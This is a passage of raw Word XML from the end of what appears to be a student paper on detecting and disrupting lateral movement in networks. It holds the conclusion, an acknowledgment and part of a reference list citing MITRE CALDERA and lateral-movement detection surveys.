        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007851BE" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">offer a </w:t>
      </w:r>
      <w:r w:rsidR="00A96AE9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>crucial</w:t>
      </w:r>
      <w:r w:rsidR="007851BE" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> leverage point in disrupting </w:t>
      </w:r>
      <w:r w:rsidR="00454911" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>an attack going through the XDR</w:t>
      </w:r>
      <w:r w:rsidR="007851BE" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E43300" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kill chain</w:t>
      </w:r>
      <w:r w:rsidR="00EF3DDF" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidR="004F3EA6" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">minimizing the impact of such attacks. </w:t>
      </w:r>
      <w:r w:rsidR="00F9001F" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Organizations</w:t>
      </w:r>
      <w:r w:rsidR="004F3EA6" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> must adopt a proactive, layered approach </w:t>
      </w:r>
      <w:r w:rsidR="00743335" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">that combines </w:t>
      </w:r>
      <w:r w:rsidR="00A96AE9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>techniques</w:t>
      </w:r>
      <w:r w:rsidR="00AA06B9" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as </w:t>
      </w:r>
      <w:r w:rsidR="00743335" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">network </w:t>
      </w:r>
      <w:r w:rsidR="00AA06B9" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">segmentation, advanced detection tools like machine learning capable systems, and </w:t>
      </w:r>
      <w:r w:rsidR="00AC283A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tools that allow for</w:t>
      </w:r>
      <w:r w:rsidR="00AA06B9" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A96AE9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>continuous</w:t>
      </w:r>
      <w:r w:rsidR="00AC283A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> monitoring</w:t>
      </w:r>
      <w:r w:rsidR="003149D4" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to strengthen a network’s resilience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684C1908" w14:textId="24E814C2" w:rsidR="00834922" w:rsidRPr="00FF6966" w:rsidRDefault="003149D4" w:rsidP="00337DE5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">As the cybersecurity landscape </w:t>
      </w:r>
      <w:r w:rsidR="00B31D35" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">grows increasingly complex, this research </w:t>
      </w:r>
      <w:r w:rsidR="00A13A38" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>underscores the urgency of developing adaptive and comprehensive strategies to protect critical infrastructure and sensitive data from persis</w:t>
      </w:r>
      <w:r w:rsidR="00C30BDD" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tent and sophisticated threats now and hopefully into the future.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3A868D" w14:textId="77777777" w:rsidR="00E6722A" w:rsidRPr="00FF6966" w:rsidRDefault="00E6722A" w:rsidP="00337DE5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FC814EC" w14:textId="2D2E67AD" w:rsidR="0080791D" w:rsidRPr="00FF6966" w:rsidRDefault="0080791D" w:rsidP="0080791D">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Acknowledgment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24106547" w14:textId="6A00676B" w:rsidR="00276F34" w:rsidRPr="00FF6966" w:rsidRDefault="00FB4DA7" w:rsidP="00836367">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We’d like to thank Dr. Bhaskar Rimal </w:t>
      </w:r>
      <w:r w:rsidR="00D710C2" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">for granting us this opportunity to work on </w:t>
      </w:r>
      <w:r w:rsidR="00936ECB" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">this </w:t>
      </w:r>
      <w:r w:rsidR="000220E5" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">self-guided </w:t>
      </w:r>
      <w:r w:rsidR="00936ECB" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>research</w:t>
      </w:r>
      <w:r w:rsidR="00B65F64" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, however limited the scope of our actual </w:t>
      </w:r>
      <w:r w:rsidR="00D76F61" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>implementation would be.</w:t>
      </w:r>
      <w:r w:rsidR="00B826AA" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B71622" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We have learned a lot about networking fundamentals </w:t>
      </w:r>
      <w:r w:rsidR="00276F34" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and hope to </w:t>
      </w:r>
      <w:r w:rsidR="00DD5F1A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">improve and continue this research </w:t>
      </w:r>
      <w:r w:rsidR="008E6E4D" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for its next steps.</w:t>
      </w:r>
      <w:r w:rsidR="00DD5F1A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00656AA1" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This research has not been sponsored by any third parties. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355B5225" w14:textId="77777777" w:rsidR="00276F34" w:rsidRPr="00FF6966" w:rsidRDefault="00276F34" w:rsidP="00337DE5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CA1BFF2" w14:textId="58C59DD0" w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidRDefault="009303D9" w:rsidP="003F648A">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144D91D7" w14:textId="77777777" w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidRDefault="009303D9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EE0A05F" w14:textId="6562DEF2" w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidRDefault="00A05FD3" w:rsidP="0004781E">
      <w:pPr>
        <w:pStyle w:val="references"/>
        <w:ind w:left="354" w:hanging="354"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">C. </w:t>
      </w:r>
      <w:r w:rsidR="0056137A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Smiliotopoulos, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>G.</w:t>
      </w:r>
      <w:r w:rsidR="0056137A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kambourakis, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">and C. </w:t>
      </w:r>
      <w:r w:rsidR="0056137A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Kolias, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="0056137A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Detecting lateral movement: A systematic survey</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,”</w:t>
      </w:r>
      <w:r w:rsidR="0056137A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Heliyon, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">vol. </w:t>
      </w:r>
      <w:r w:rsidR="0056137A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, no. </w:t>
      </w:r>
      <w:r w:rsidR="0056137A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, p.</w:t>
      </w:r>
      <w:r w:rsidR="0056137A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> e26317</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, Apr. 2024. [Online]. Available:</w:t>
      </w:r>
      <w:r w:rsidR="0056137A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://doi.org/10.1016/j.heliyon.2024.e26317</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A75505B" w14:textId="6CAE6B22" w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidRDefault="000F3AB4" w:rsidP="0004781E">
      <w:pPr>
        <w:pStyle w:val="references"/>
        <w:ind w:left="354" w:hanging="354"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>A. Miller and J. Stoner, "CALDERA: Automating Adversary Emulation," in Black Hat Europe 2017 Briefings, Dec. 2017. [Online]. Available: https://www.blackhat.com/docs/eu-17/materials/eu-</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>17-Miller-CALDERA-Automating-Adversary-Emulation.pdf</w:t>
      </w:r>
      <w:r w:rsidR="009303D9" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51985FA4" w14:textId="0A905BE2" w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidRDefault="006D27A5" w:rsidP="0004781E">
      <w:pPr>
        <w:pStyle w:val="references"/>
        <w:ind w:left="354" w:hanging="354"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>S. Hauser, J. Voris, and N. Christin, "Honeytokens in Active Directory: Detection and Defense," in Proceedings of the 30th USENIX Security Symposium (USENIX Security '21), Aug. 2021. [Online].</w:t>
      </w:r>
      <w:r w:rsidR="00833536" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Available: https://www.usenix.org/system/files/sec21-ho.pdf</w:t>
      </w:r>
      <w:r w:rsidR="009303D9" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D99F356" w14:textId="1AF7DA29" w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidRDefault="00B85001" w:rsidP="0004781E">
      <w:pPr>
        <w:pStyle w:val="references"/>
        <w:ind w:left="354" w:hanging="354"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MITRE, "CALDERA: Adversary Emulation Platform," GitHub Repository. [Online]. Available: https://github.com/mitre/caldera</w:t>
      </w:r>
      <w:r w:rsidR="009303D9" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7619257F" w14:textId="0F7AD70E" w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidRDefault="009F6262" w:rsidP="0004781E">
      <w:pPr>
        <w:pStyle w:val="references"/>
        <w:ind w:left="354" w:hanging="354"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>F. Veljkovic, V. Radojicic, and M. Malnar, “Cybersecurity challenges in the industrial internet of things: A comprehensive review,” Electronics, vol. 13, no. 19, p. 3944, Sep. 2024. [Online]. Available: https://www.mdpi.com/2079-9292/13/19/3944</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC0719F" w14:textId="50E002C2" w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidRDefault="009A1E6D" w:rsidP="0004781E">
      <w:pPr>
        <w:pStyle w:val="references"/>
        <w:ind w:left="354" w:hanging="354"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MITRE Engenuity. (n.d.). CALDERA Pathfinder. Center for Threat-Informed Defense. Retrieved November 21, 2024, from https://mitre-engenuity.org/cybersecurity/center-for-threat-informed-defense/our-work/caldera-pathfinder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD3BD9A" w14:textId="11152765" w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidRDefault="00C7047C" w:rsidP="0004781E">
      <w:pPr>
        <w:pStyle w:val="references"/>
        <w:ind w:left="354" w:hanging="354"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Ussath, M., Jaeger, D., Cheng, F., &amp; Meinel, C. (2023). A survey on lateral movement detection. Journal of Cybersecurity, 9(1), tyad005. https://doi.org/10.1093/cybsec/tyad005</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6F4A28" w14:textId="77777777" w:rsidR="008147B5" w:rsidRPr="00FF6966" w:rsidRDefault="008147B5" w:rsidP="008147B5">
      <w:pPr>
        <w:pStyle w:val="references"/>
        <w:ind w:left="354" w:hanging="354"/>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:eastAsia="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">K. Eves and J. Valasek, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Adaptive control for singularly perturbed systems examples,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Code Ocean, Aug. 2023. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="00FF6966">
          <w:rPr>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>https://codeocean.com/capsule/4989235/tree</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7CB9FE" w14:textId="44D4E85B" w:rsidR="008147B5" w:rsidRPr="00FF6966" w:rsidRDefault="00B25C55" w:rsidP="008147B5">
      <w:pPr>
        <w:pStyle w:val="references"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="354" w:hanging="354"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>S. M. Milajerdi, R. Gjomemo, B. Eshete, R. Sekar, and V. Venkatakrishnan, “HOLMES: Real-time APT detection through correlation of suspicious information flows,” in 2019 IEEE Symposium on Security and Privacy (SP), May 2019, pp. 1137–</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1152. [Online]. Available: https://doi.org/10.1109/SP.2019.00026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF840D5" w14:textId="448DD416" w:rsidR="008147B5" w:rsidRPr="00FF6966" w:rsidRDefault="00986050" w:rsidP="008147B5">
      <w:pPr>
        <w:pStyle w:val="references"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="354" w:hanging="354"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Cisco, Cisco Packet Tracer. [Online]. Available: https://www.netacad.com/learning-collections/cisco-packet-tracer?courseLang=en-US. [Accessed: Dec. 11, 2024].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DBF316" w14:textId="092EC047" w:rsidR="008147B5" w:rsidRPr="00FF6966" w:rsidRDefault="00C3141B" w:rsidP="008147B5">
      <w:pPr>
        <w:pStyle w:val="references"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="354" w:hanging="354"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MITRE, CALDERA Documentation. [Online]. Available: https://readthedocs.org/projects/caldera/downloads/pdf/latest/. [Accessed: Dec. 11, 2024].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382B0200" w14:textId="55F3BC1F" w:rsidR="00114E4E" w:rsidRPr="00FF6966" w:rsidRDefault="00F778AD" w:rsidP="008147B5">
      <w:pPr>
        <w:pStyle w:val="references"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="354" w:hanging="354"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Elisity, "Understanding and Preventing Lateral Movement: A Strategic Guide for Enterprise Security Leaders," Elisity Blog. [Online]. Available: https://www.elisity.com/blog/understanding-and-preventing-lateral-movement-a-strategic-guide-for-enterprise-security-leaders. [Accessed: Dec. 11, 2024].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F40B88E" w14:textId="4B8596BB" w:rsidR="00F778AD" w:rsidRPr="00FF6966" w:rsidRDefault="00453ED8" w:rsidP="008147B5">
      <w:pPr>
        <w:pStyle w:val="references"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="354" w:hanging="354"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>J. Goh, S. Adepu, M. Tan, and Z. S. Lee, “Anomaly detection in cyber physical systems using recurrent neural networks,” in 2017 IEEE 18th International Symposium on High Assurance Systems Engineering (HASE), Jan. 2017, pp. 140–145. [Online]. Available: https://doi.org/10.1109/HASE.2017.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2166855B" w14:textId="4FB32463" w:rsidR="0074666B" w:rsidRPr="00FF6966" w:rsidRDefault="0074666B" w:rsidP="008147B5">
      <w:pPr>
        <w:pStyle w:val="references"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="354" w:hanging="354"/>
        <w:jc w:val="left"/>
        <w:rPr>
